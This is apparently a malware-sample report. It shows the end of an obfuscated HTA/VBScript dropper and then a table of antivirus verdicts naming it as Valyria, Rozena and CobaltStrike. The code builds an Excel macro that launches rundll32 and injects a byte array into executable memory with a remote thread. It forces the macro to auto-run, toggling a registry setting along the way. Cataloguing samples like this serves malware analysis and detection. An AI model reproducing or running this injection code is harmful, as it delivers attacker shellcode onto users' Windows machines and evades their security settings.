Chr(45)&"1"&Chr(44)&"119"&Chr(44)&"119"&Chr(44)&"119"&Chr(44)&"46"&Chr(44)&"104"&Chr(44)&"101"&Chr(44)&"97"&Chr(44)&"108"&Chr(44)&"116"&Chr(44)&"104"&Chr(44)&"115"&Chr(44)&"111"&Chr(44)&"117"&Chr(44)&"116"& _
Chr(44)&"104"&Chr(44)&"100"&Chr(44)&"111"&Chr(44)&"116"&Chr(44)&"104"&Chr(44)&"97"&Chr(44)&"110"&Chr(44)&" _"&Chr(10)&"46"&Chr(44)&"99"&Chr(44)&"111"&Chr(44)&"109"&Chr(44)&"0"&Chr(44)&"124"&Chr(44)&"9"& _
Chr(44)&"119"&Chr(44)&Chr(45)&"62"&Chr(41)&Chr(10)&" If L"&"en"&Chr(40)&"Environ"&Chr(40)&Chr(34)&"ProgramW"&"6432"&Chr(34)&Chr(41)&Chr(41)&" "&Chr(62)&" 0 Then"&Chr(10)&" "&"sProc "&Chr(61)& _
" Environ"&Chr(40)&Chr(34)&"windir"&Chr(34)&Chr(41)&" "&Chr(38)&" "&Chr(34)&Chr(92)&Chr(92)&"SysWOW64"&Chr(92)&Chr(92)&"rundll32"&Chr(46)&"exe"&Chr(34)&Chr(10)&" Else"&Chr(10)&" "&"sProc "&Chr(61)& _
" Environ"&Chr(40)&Chr(34)&"windir"&Chr(34)&Chr(41)&" "&Chr(38)&" "&Chr(34)&Chr(92)&Chr(92)&"System32"&Chr(92)&Chr(92)&"rundll32"&Chr(46)&"exe"&Chr(34)&Chr(10)&" End "&"If"&Chr(10)&Chr(10)&" res "& _
Chr(61)&" RunStuf"&"f"&Chr(40)&"sNull"&Chr(44)&" sProc"&Chr(44)&" ByVal 0"&Chr(38)&Chr(44)&" ByVal 0"&Chr(38)&Chr(44)&" ByVal 1"&Chr(38)&Chr(44)&" ByVal 4"&Chr(38)&Chr(44)&" ByVal 0"&Chr(38)&Chr(44)&" sNull"& _
Chr(44)&" sInfo"&Chr(44)&" pInfo"&Chr(41)&Chr(10)&Chr(10)&" rwxp"&"age "&Chr(61)&" AllocSt"&"uff"&Chr(40)&"pInfo"&Chr(46)&"hProcess"&Chr(44)&" 0"&Chr(44)&" UBound"&Chr(40)&"myArray"&Chr(41)&Chr(44)& _
" "&Chr(38)&"H1000"&Chr(44)&" "&Chr(38)&"H40"&Chr(41)&Chr(10)&" For "&"offset "&Chr(61)&" LBound"&Chr(40)&"myArray"&Chr(41)&" To UBou"&"nd"&Chr(40)&"myArray"&Chr(41)&Chr(10)&" "&"myByte "&Chr(61)& _
" myArray"&Chr(40)&"offset"&Chr(41)&Chr(10)&" "&"res "&Chr(61)&" WriteSt"&"uff"&Chr(40)&"pInfo"&Chr(46)&"hProcess"&Chr(44)&" rwxpage"&" "&Chr(43)&" offset"&Chr(44)&" myByte"&Chr(44)&" 1"&Chr(44)& _
" ByVal 0"&Chr(38)&Chr(41)&Chr(10)&" Next"&" offset"&Chr(10)&" res "&Chr(61)&" CreateS"&"tuff"&Chr(40)&"pInfo"&Chr(46)&"hProcess"&Chr(44)&" 0"&Chr(44)&" 0"&Chr(44)&" rwxpage"&Chr(44)&" 0"&Chr(44)& _
" 0"&Chr(44)&" 0"&Chr(41)&Chr(10)&"End Sub"&Chr(10)&"Sub Auto"&"Open"&Chr(40)&Chr(41)&Chr(10)&" Auto"&"_Open"&Chr(10)&"End Sub"&Chr(10)&"Sub Work"&"book_Ope"&"n"&Chr(40)&Chr(41)&Chr(10)&" Auto"&"_Open"& _
Chr(10)&"End Sub"&Chr(10)
objExcel.DisplayAlerts = False
on error resume next
objExcel.Run "Auto_Open"
objWorkbook.Close False
objExcel.Quit
' Restore the registry to its old state
if action = "" then
WshShell.RegDelete RegPath
WshShell.RegWrite RegPath, action, "REG_DWORD"
end if
self.close
</script></head></html>
Antivirus Signature
Bkav Clean
Lionic Clean
MicroWorld-eScan VB:Trojan.Valyria.481
FireEye VB:Trojan.Valyria.481
CAT-QuickHeal VBS.Trojan.Script.38976
McAfee HTML/Injector.a
Malwarebytes Clean
VIPRE Clean
Sangfor Clean
K7AntiVirus Clean
K7GW Clean
BitDefenderTheta Clean
Cyren Clean
Symantec Trojan.Malscript
ESET-NOD32 Win32/Rozena.XZ
Baidu Clean
TrendMicro-HouseCall Clean
Avast VBS:Agent-BTN [Trj]
ClamAV Html.Trojan.CobaltStrike-7932564-0
Kaspersky Trojan.VBS.MacroDisable.b
BitDefender VB:Trojan.Valyria.481
NANO-Antivirus Trojan.Script.Vbs-heuristic.druvzi
ViRobot Clean
Tencent Html.Win32.Script.504167
Ad-Aware VB:Trojan.Valyria.481
Sophos ATK/VBSInj-C
Comodo Clean
F-Secure Clean
DrWeb MACRO.Virus
Zillya Clean
TrendMicro Clean
McAfee-GW-Edition BehavesLike.HTML.Backdoor.mr
CMC Clean
Emsisoft VB:Trojan.Valyria.481 (B)
Ikarus Trojan.VB.Valyria
GData VB:Trojan.Valyria.481
Jiangmin Clean
Avira Clean
Antiy-AVL Clean
Kingsoft Clean
Gridinsoft Clean
Arcabit Clean
SUPERAntiSpyware Clean
ZoneAlarm Clean
Microsoft Trojan:VBS/Valyria.A!MSR
Cynet Clean
AhnLab-V3 Clean
Acronis Clean
VBA32 Clean
ALYac VB:Trojan.Valyria.481
MAX malware (ai score=83)
Zoner Clean
Rising HackTool.MacroRunner/VBS!1.D1CA (CLASSIC)
Yandex Clean
TACHYON Clean
MaxSecure Clean
Fortinet VBS/Rozena.XZ!tr
AVG VBS:Agent-BTN [Trj]
Panda Clean
No IRMA results available.